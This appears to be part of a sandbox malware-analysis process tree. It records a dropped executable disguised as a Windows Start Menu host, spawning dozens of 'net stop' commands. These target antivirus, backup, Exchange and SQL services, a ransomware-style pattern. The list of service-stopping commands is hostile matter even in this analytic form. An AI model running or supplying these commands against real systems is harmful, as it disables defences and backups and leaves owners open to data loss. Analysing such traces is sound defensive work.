"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe" -start
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4240

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe" -agent 0
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Acronis VSS Provider" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\SysWOW64\net.exe
net stop "Acronis VSS Provider" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
5⤵
PID:4716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Enterprise Client Service" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\SysWOW64\net.exe
net stop "Enterprise Client Service" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
5⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "SQL Backups" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\SysWOW64\net.exe
net stop "SQL Backups" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
5⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Backup Service" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Backup Service" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
5⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Filter Service" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Filter Service" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
5⤵
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Agent" /y
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\SysWOW64\net.exe
net stop "Sophos Agent" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent" /y
5⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos AutoUpdate Service" /y
3⤵
PID:1816

C:\Windows\SysWOW64\net.exe
net stop "Sophos AutoUpdate Service" /y
4⤵
PID:3152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
5⤵
PID:4612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Clean Service" /y
3⤵
PID:3932

C:\Windows\SysWOW64\net.exe
net stop "Sophos Clean Service" /y
4⤵
PID:4376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service" /y
5⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Device Control Service" /y
3⤵
PID:2012

C:\Windows\SysWOW64\net.exe
net stop "Sophos Device Control Service" /y
4⤵
PID:2440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
5⤵
PID:3688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos File Scanner Service" /y
3⤵
PID:4752

C:\Windows\SysWOW64\net.exe
net stop "Sophos File Scanner Service" /y
4⤵
PID:2196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
5⤵
PID:1940

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Health Service" /y
3⤵
PID:4040

C:\Windows\SysWOW64\net.exe
net stop "Sophos Health Service" /y
4⤵
PID:1132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service" /y
5⤵
PID:4272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Agent" /y
3⤵
PID:3212

C:\Windows\SysWOW64\net.exe
net stop "Sophos MCS Agent" /y
4⤵
PID:628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
5⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos MCS Client" /y
3⤵
PID:4736

C:\Windows\SysWOW64\net.exe
net stop "Sophos MCS Client" /y
4⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client" /y
5⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Message Router" /y
3⤵
PID:912

C:\Windows\SysWOW64\net.exe
net stop "Sophos Message Router" /y
4⤵
PID:3968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router" /y
5⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Safestore Service" /y
3⤵
PID:1452

C:\Windows\SysWOW64\net.exe
net stop "Sophos Safestore Service" /y
4⤵
PID:4192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
5⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos System Protection Service" /y
3⤵
PID:456

C:\Windows\SysWOW64\net.exe
net stop "Sophos System Protection Service" /y
4⤵
PID:3720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
5⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Sophos Web Control Service" /y
3⤵
PID:4472

C:\Windows\SysWOW64\net.exe
net stop "Sophos Web Control Service" /y
4⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
5⤵
PID:5044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Symantec System Recovery" /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net stop "Symantec System Recovery" /y
4⤵
PID:4544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery" /y
5⤵
PID:2504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Veeam Backup Catalog Data Service" /y
3⤵
PID:1580

C:\Windows\SysWOW64\net.exe
net stop "Veeam Backup Catalog Data Service" /y
4⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
5⤵
PID:3768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop "Zoolz 2 Service" /y
3⤵
PID:3772

C:\Windows\SysWOW64\net.exe
net stop "Zoolz 2 Service" /y
4⤵
PID:1136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
5⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ARSM /y
3⤵
PID:3552

C:\Windows\SysWOW64\net.exe
net stop ARSM /y
4⤵
PID:5060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
5⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop AVP /y
3⤵
PID:2348

C:\Windows\SysWOW64\net.exe
net stop AVP /y
4⤵
PID:4416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
5⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop AcrSch2Svc /y
3⤵
PID:2128

C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc /y
4⤵
PID:5116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
5⤵
PID:1484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop AcronisAgent /y
3⤵
PID:4424

C:\Windows\SysWOW64\net.exe
net stop AcronisAgent /y
4⤵
PID:2892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
5⤵
PID:852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop Antivirus /y
3⤵
PID:1320

C:\Windows\SysWOW64\net.exe
net stop Antivirus /y
4⤵
PID:2256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
5⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentAccelerator /y
3⤵
PID:5064

C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentAccelerator /y
4⤵
PID:4116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
5⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecAgentBrowser /y
3⤵
PID:1820

C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentBrowser /y
4⤵
PID:1316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
5⤵
PID:2672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecDeviceMediaService /y
3⤵
PID:1448

C:\Windows\SysWOW64\net.exe
net stop BackupExecDeviceMediaService /y
4⤵
PID:3048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
5⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecJobEngine /y
3⤵
PID:2284

C:\Windows\SysWOW64\net.exe
net stop BackupExecJobEngine /y
4⤵
PID:1236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
5⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecManagementService /y
3⤵
PID:2180

C:\Windows\SysWOW64\net.exe
net stop BackupExecManagementService /y
4⤵
PID:1572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
5⤵
PID:3448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecRPCService /y
3⤵
PID:1748

C:\Windows\SysWOW64\net.exe
net stop BackupExecRPCService /y
4⤵
PID:4040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
5⤵
PID:2980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop BackupExecVSSProvider /y
3⤵
PID:3836

C:\Windows\SysWOW64\net.exe
net stop BackupExecVSSProvider /y
4⤵
PID:1884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
5⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop DCAgent /y
3⤵
PID:3224

C:\Windows\SysWOW64\net.exe
net stop DCAgent /y
4⤵
PID:4916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
5⤵
PID:4736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop EPSecurityService /y
3⤵
PID:2780

C:\Windows\SysWOW64\net.exe
net stop EPSecurityService /y
4⤵
PID:3972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
5⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop EPUpdateService /y
3⤵
PID:3124

C:\Windows\SysWOW64\net.exe
net stop EPUpdateService /y
4⤵
PID:4488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
5⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ESHASRV /y
3⤵
PID:3008

C:\Windows\SysWOW64\net.exe
net stop ESHASRV /y
4⤵
PID:3720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
5⤵
PID:3388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop EhttpSrv /y
3⤵
PID:1920

C:\Windows\SysWOW64\net.exe
net stop EhttpSrv /y
4⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
5⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop EraserSvc11710 /y
3⤵
PID:1712

C:\Windows\SysWOW64\net.exe
net stop EraserSvc11710 /y
4⤵
PID:996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
5⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop EsgShKernel /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net stop EsgShKernel /y
4⤵
PID:1976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
5⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop FA_Scheduler /y
3⤵
PID:3952

C:\Windows\SysWOW64\net.exe
net stop FA_Scheduler /y
4⤵
PID:5024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
5⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop IISAdmin /y
3⤵
PID:540

C:\Windows\SysWOW64\net.exe
net stop IISAdmin /y
4⤵
PID:1520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
5⤵
PID:1416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop IMAP4Svc /y
3⤵
PID:4808

C:\Windows\SysWOW64\net.exe
net stop IMAP4Svc /y
4⤵
PID:4996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
5⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop KAVFS /y
3⤵
PID:1432

C:\Windows\SysWOW64\net.exe
net stop KAVFS /y
4⤵
PID:3460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
5⤵
PID:560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop KAVFSGT /y
3⤵
PID:2128

C:\Windows\SysWOW64\net.exe
net stop KAVFSGT /y
4⤵
PID:2892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
5⤵
PID:624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MBAMService /y
3⤵
PID:928

C:\Windows\SysWOW64\net.exe
net stop MBAMService /y
4⤵
PID:3652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
5⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MBEndpointAgent /y
3⤵
PID:1776

C:\Windows\SysWOW64\net.exe
net stop MBEndpointAgent /y
4⤵
PID:3116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
5⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MMS /y
3⤵
PID:4852

C:\Windows\SysWOW64\net.exe
net stop MMS /y
4⤵
PID:3924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
5⤵
PID:2220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeES /y
3⤵
PID:1328

C:\Windows\SysWOW64\net.exe
net stop MSExchangeES /y
4⤵
PID:1448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
5⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeIS /y
3⤵
PID:1560

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS /y
4⤵
PID:2012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
5⤵
PID:2452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeMGMT /y
3⤵
PID:2024

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMGMT /y
4⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
5⤵
PID:4880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeMTA /y
3⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMTA /y
4⤵
PID:1604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
5⤵
PID:2064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeSA /y
3⤵
PID:3212

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA /y
4⤵
PID:4080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
5⤵
PID:776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSExchangeSRS /y
3⤵
PID:4864

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSRS /y
4⤵
PID:2548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
5⤵
PID:3240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SQL_2008 /y
3⤵
PID:3928

C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SQL_2008 /y
4⤵
PID:4948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
5⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:4536

C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:3476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
5⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPS /y
3⤵
PID:3056

C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPS /y
4⤵
PID:1460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
5⤵
PID:3388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSOLAP$TPSAMA /y
3⤵
PID:4468

C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPSAMA /y
4⤵
PID:1092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
5⤵
PID:312

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$BKUPEXEC /y
3⤵
PID:4440

C:\Windows\SysWOW64\net.exe
net stop MSSQL$BKUPEXEC /y
4⤵
PID:1712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
5⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$ECWDB2 /y
3⤵
PID:1428

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ECWDB2 /y
4⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
5⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTICEMGT /y
3⤵
PID:2516

C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTICEMGT /y
4⤵
PID:212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
5⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PRACTTICEBGC /y
3⤵
PID:3772

C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTTICEBGC /y
4⤵
PID:2644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
5⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROD /y
3⤵
PID:1244

C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROD /y
4⤵
PID:1224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
5⤵
PID:4104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:5004

C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:1484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
5⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SBSMONITORING /y
3⤵
PID:560

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SBSMONITORING /y
4⤵
PID:3800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
5⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SHAREPOINT /y
3⤵
PID:3540

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SHAREPOINT /y
4⤵
PID:4496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
5⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SOPHOS /y
3⤵
PID:1524

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SOPHOS /y
4⤵
PID:5064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
5⤵
PID:3116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQLEXPRESS /y
3⤵
PID:1776

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS /y
4⤵
PID:828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
5⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SQL_2008 /y
3⤵
PID:4696

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL_2008 /y
4⤵
PID:2072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
5⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$SYSTEM_BGC /y
3⤵
PID:1640

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SYSTEM_BGC /y
4⤵
PID:4124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
5⤵
PID:2596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPS /y
3⤵
PID:3060

C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPS /y
4⤵
PID:4752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
5⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$TPSAMA /y
3⤵
PID:3384

C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPSAMA /y
4⤵
PID:2268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
5⤵
PID:4880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2064

C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:1748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:3144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:5048

C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:3212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:3836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:4916

C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:5100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
5⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher /y
3⤵
PID:4092

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher /y
4⤵
PID:3176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
5⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:2756

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:4332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
5⤵
PID:4536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:1664

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:3008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
5⤵
PID:832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:3388

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:4908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
5⤵
PID:4624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:3136

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:1056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
5⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:4440

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:3632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
5⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPS /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPS /y
4⤵
PID:240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
5⤵
PID:4980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:4832

C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:3480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
5⤵
PID:2176

